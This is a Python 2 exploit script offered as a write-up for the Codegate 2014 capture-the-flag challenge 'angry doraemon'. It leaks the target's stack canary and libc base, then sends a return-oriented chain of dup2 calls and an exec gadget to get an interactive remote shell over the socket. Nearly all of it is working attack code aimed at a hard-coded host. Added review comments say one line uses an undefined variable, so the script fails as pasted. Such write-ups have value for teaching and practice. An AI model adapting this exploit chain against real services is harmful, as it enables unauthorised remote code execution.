
Codegate 2014 doraemon write up by @_g05u_

  1. #!/usr/bin/env python
  2. #-*- coding:utf-8 -*-
  3.  
  4. # Codegate 2014 write up by @_g05u_
  5. # angry doraemon
  6. # pwnable 250
  7. # null-life.com
  8.  
  9. import re
  10. import os
  11. import sys
  12. import math
  13. import time
  14. import struct
  15. import socket
  16.  
HOST = "58.229.183.18"  # challenge service address; only read by get_socket()
PORT = 8888

#Ubuntu 13.10 x86
# Offsets inside the target's libc build, relative to the libc load address.
# They are tied to the platform named above; any other libc build needs its
# own values (this is why the script leaks the base first instead of hard-coding it).
offset_libc_main = 0x19810
offset_dup2 = 0xE11F0

# Fixed addresses inside the challenge binary itself (0x0804xxxx suggests a
# non-PIE 32-bit executable — not verifiable from this file alone).
got_libc_main = 0x0804B038  # NOTE(review): defined here but never referenced anywhere below
got_write = 0x080486e0  # first return target of the frame built by gadget_leer()
rop_pop2_ret = 0x080495BE  # by name and use: pops two stack slots then returns; cleans dup2 args in get_rop_shell()
exec_sh = 0x08048C62  # final return target of the chain built by get_rop_shell()

# NOTE(review): this hard-coded value is never used — the script rebinds
# `canary` from get_canary() before the first send that includes it.
canary = "\x00\x8b\xc3\x84"
  30.  
  31.  
def get_socket():
    """Open a new TCP connection to the service at HOST:PORT and return it.

    Every interaction below opens its own connection; nothing here closes them.
    """
    return socket.create_connection((HOST, PORT))
  36.        
def read_logo(s):
        """Consume the service banner, wait out its announced delay, then consume the menu prompt.

        `s` is a connected socket. Nothing is returned; the function only
        advances the stream to the point where the menu accepts input.
        """
        def wait_for(marker, bufsize):
                # Each recv() replaces the buffer rather than appending to it, so
                # the marker has to arrive inside a single read (same as the original).
                chunk = ''
                while marker not in chunk:
                        chunk = s.recv(bufsize)

        wait_for('Waiting 2 seconds', 1024 * 5)
        time.sleep(2.2)  # slightly longer than the delay the banner announces
        wait_for('>', 1024)
  45.                
  46.  
def gadget_leer(addr, n):
        """Build the 20-byte frame that makes the overwritten return address call write().

        Slot layout (each a little-endian 32-bit value, in stack order):
          got_write    - address the corrupted return slot jumps to
          0x080492c5   - where write() returns to afterwards (the author labels it "exit return")
          4            - first argument: an already-open fd (presumably the client connection)
          addr         - second argument: address to read from
          n            - third argument: number of bytes to send back

        Returns the packed str; the caller appends it after the canary and padding.
        """
        data  = struct.pack("<I", got_write)
        data += struct.pack("<I", 0x080492c5) # return address after write() ("exit return")
        data += struct.pack("<I", 0x4) # already-open fd
        data += struct.pack("<I", addr)
        data += struct.pack("<I", n)

        return data
  55.  
def get_canary():
        """Leak the 4-byte stack canary by over-filling the menu's 10-byte answer.

        Opens its own connection, picks menu option '4', answers with ten 'y'
        bytes and reads 26 bytes of the echoed reply; bytes 22:26 of that reply
        are treated as the canary. The later payloads place the canary directly
        after the ten answer bytes, so the leak presumably works because the
        echo runs past the answer buffer into the adjacent stack bytes — verify
        against the binary. Returns the canary as a 4-byte str.

        Caveats: all synchronisation is sleep-based, recv(26) may return fewer
        bytes (then the slice is shorter than 4), and the socket is never closed.
        """
        print '[+] get canary '
        s = get_socket()
        read_logo(s)
        s.send('4')
        time.sleep(0.1)
        s.recv(1024) # read the prompt
        time.sleep(0.1)
        s.send('y'*10)
        time.sleep(0.1)
        mi_opc = s.recv(26) # read back the echoed option
        _canary = mi_opc[22:]
        print '[+] Canary 0x%s' % (''.join(c.encode('hex') for c in _canary))
        return _canary
  70.  
def get_rop_shell(libc_base):
        """Build the return-oriented chain that redirects stdio to fd 4 and runs exec_sh.

        `libc_base` is the leaked libc load address; dup2 is located as
        libc_base + offset_dup2. The chain is three calls of dup2(4, i) for
        i = 0, 1, 2, each followed by rop_pop2_ret to discard its two
        arguments, and finally a return into exec_sh. Returns the packed str.

        Every slot is position-dependent: reordering any line changes the chain.
        """
        print '[+] dup2 address: %s' % hex(libc_base + offset_dup2)
        # dup2(4, 0): stdin
        data  = struct.pack("<I", libc_base + offset_dup2)
        data += struct.pack("<I", rop_pop2_ret)
        data += struct.pack("<I", 4) # already-open fd
        data += struct.pack("<I", 0)

        # dup2(4, 1): stdout
        data += struct.pack("<I", libc_base + offset_dup2)
        data += struct.pack("<I", rop_pop2_ret)
        data += struct.pack("<I", 4) # already-open fd
        data += struct.pack("<I", 1)

        # dup2(4, 2): stderr
        data += struct.pack("<I", libc_base + offset_dup2)
        data += struct.pack("<I", rop_pop2_ret)
        data += struct.pack("<I", 4) # already-open fd
        data += struct.pack("<I", 2)

        # final return target inside the binary
        data += struct.pack("<I", exec_sh)
        return data
  90.  
# NOTE(review): Python 2 script (print statements, str payloads); it does not
# run under Python 3 as pasted.
canary = get_canary()

print 'Obteniendo libc base'
#get libc address base
# Second connection: same menu path as get_canary(), but the ten-byte answer
# is followed by the leaked canary, 12 bytes of padding and the write() frame
# from gadget_leer(), so the service sends back `n` bytes read from `addr`.
s = get_socket()
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) # read the prompt
time.sleep(0.1)
# NOTE(review): the address handed to gadget_leer() is offset_libc_main, a
# libc-relative offset, while got_libc_main is defined above and never used.
s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
# NOTE(review): `base_libc_main` is not defined anywhere in this file, so this
# line raises NameError as pasted. s.recv(4) may also return fewer than 4
# bytes, in which case struct.unpack raises struct.error.
libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
print '[+] Addres libc base: %s' % hex(libc_base_address)

print 'Lanzando shell'
# launch shell
# Third connection: same path, with the dup2/exec chain from get_rop_shell().
# The socket from the leak step is never closed before `s` is rebound here.
rop_shell = get_rop_shell(libc_base_address)
s = get_socket()
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) # read the prompt
time.sleep(0.1)
s.send('y'*10 + canary + "A"*12 + rop_shell)

# Interactive relay: forward each stdin line to the socket and print whatever
# comes back. recv() blocks, so a command that produces no output stalls the
# loop; the 0.5 s sleep is the only synchronisation with the remote side.
while True:
    sys.stdout.write("$ ")
    sys.stdout.flush()
    c = sys.stdin.readline()
    s.send(c)
    time.sleep(0.5)
    print s.recv(4095)